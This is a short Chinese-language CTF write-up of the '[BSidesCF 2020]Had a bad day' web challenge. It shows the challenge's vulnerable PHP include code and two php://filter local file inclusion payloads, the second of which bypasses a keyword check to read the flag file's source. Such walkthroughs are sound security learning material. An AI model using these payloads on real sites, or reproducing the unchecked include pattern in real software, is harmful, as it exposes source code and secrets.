BUU-WEB-[BSidesCF 2020]Had a bad day

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[BSidesCF 2020]Had a bad day相关的知识,希望对你有一定的参考价值。

[BSidesCF 2020]Had a bad day

随便访问一下,发现url中存在注入。
在这里插入图片描述
初步猜测是文件包含漏洞,于是尝试直接读取index的源码。
利用php://filter的伪协议进行读取base64编码。
构建的payload为:

/index.php?category=php://filter/convert.base64-encode/resource=index.php

在这里插入图片描述
报错了。(不应该呀,没毛病啊,百度一下看了一下大佬们的姿势,发现是index,不是index.php,拉胯了)
在这里插入图片描述
这就可以读取主页的base64编码了。
解码一下:
(只保留了php代码部分)

<?php
	$file = $_GET['category'];

	if(isset($file))
	{
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
		include ($file . '.php');
		}
	else{
		echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>

php审计一下:
以get方式传入参数category。
catgory中必须包含:woofers,meowers或者index中的一种。
尝试借助index读取flag页面的源码。
构建payload:

?category=php://filter/convert.base64-encode/index/resource=flag

在这里插入图片描述

在这里插入图片描述

成功拿到flag。

以上是关于BUU-WEB-[BSidesCF 2020]Had a bad day的主要内容,如果未能解决你的问题,请参考以下文章

[BSidesCF 2019]Sequel SQLite注入

BUU-WEB-[NPUCTF2020]ReadlezPHP

BUU-WEB-[MRCTF2020]套娃

BUU-WEB-[网鼎杯 2020 青龙组]AreUSerialz

BUU-WEB-[BJDCTF2020]EasySearch

BUU-WEB-[MRCTF2020]你传你呢